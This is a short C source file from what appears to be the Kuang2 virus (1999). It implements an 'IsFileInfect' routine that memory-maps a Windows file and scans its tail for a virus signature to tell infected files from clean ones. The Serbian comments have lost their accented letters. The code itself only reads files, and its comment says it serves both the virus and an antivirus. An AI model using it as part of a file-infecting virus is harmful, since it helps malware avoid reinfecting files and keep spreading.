/***[ThuNderSoft]*************************************************************
							  KUANG2: IsFileInfect
								   ver: 0.10
								 WEIRD 
*****************************************************************************/

/* HISTORY */
// ver 0.10 (12-may-1999): born code

#include <windows.h>
#include <strmem.h>

// minimalna veliina fajla	 ( < veliine dodatog virusa)
#define		MIN_FILE_LEN	9000
// koliko od kraja fajla treba poeti skeniranje ( > veliine dodatog virusa)
#define		FROM_END		12500

/*
	IsFileInfect
	------------
   proverava da li je neki fajl ve inficiran.
   mora posebno jer vri samo itanje.
   vraa -1 za tehnike probleme, 0 za ist fajl, 1 za inficiran
   indetino u virusu i antivirusu
   brz i inteligentan. */

int IsFileInfect(char *fname, char* virus_sign) {
	HANDLE hfile, hfilemap;
	char *filemap, *filestart;
	DWORD fattr;
	DWORD fsize;
	unsigned int retvalue;
	unsigned int koliko;

	retvalue=-1;						// oznai tehniku greku (default)

	fattr=GetFileAttributes(fname);		// uzmi atribute fajla

	// otvaramo fajl
	hfile=CreateFile(fname, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, fattr, NULL);
	if (hfile==INVALID_HANDLE_VALUE) goto end1;

	// uzmi veliinu fajla
	fsize=GetFileSize(hfile, NULL);
	if (fsize==0xFFFFFFFF) goto end2;	// greka
	if (fsize<MIN_FILE_LEN) {			// ako je veliina fajla manja
		retvalue=0;						// od veliine dodatog virusa
		goto end2;						// znai da je fajl ist (0)
	}

	// kreiramo MMF
	hfilemap=CreateFileMapping (hfile, NULL, PAGE_READONLY, 0, fsize, NULL);
	if (hfilemap==NULL) goto end2;
	// kreiramo MMF view na ceo fajl
	filemap=(void *) MapViewOfFile (hfilemap, FILE_MAP_READ, 0,0,0);
	if (filemap==NULL) goto end3;
	filestart=filemap;

	// odredi poetak skeniranja...
	if (fsize>FROM_END) {				// ako je fajl vei od FROM_END
		filemap+=(fsize-FROM_END);		// pomeri se tako da ima FROM_END do kraja
		koliko=FROM_END;				// oznai koliko ima za skeniranje
	} else koliko=fsize;				// oznai da se ceo fajl skenira

	// proveri da li je ve zaraen (ak 50 znakova!)
	if (memfind(filemap, koliko, virus_sign, 50)!=-1)
		retvalue=1;					// zaraen fajl
		else retvalue=0;			// ist fajl

	UnmapViewOfFile(filestart); // zatvari MMF view
end3:
	CloseHandle(hfilemap);		// zatvori MMF
end2:
	CloseHandle(hfile);			// zatvori fajl
end1:
	return retvalue;			// vrati rezultat
}

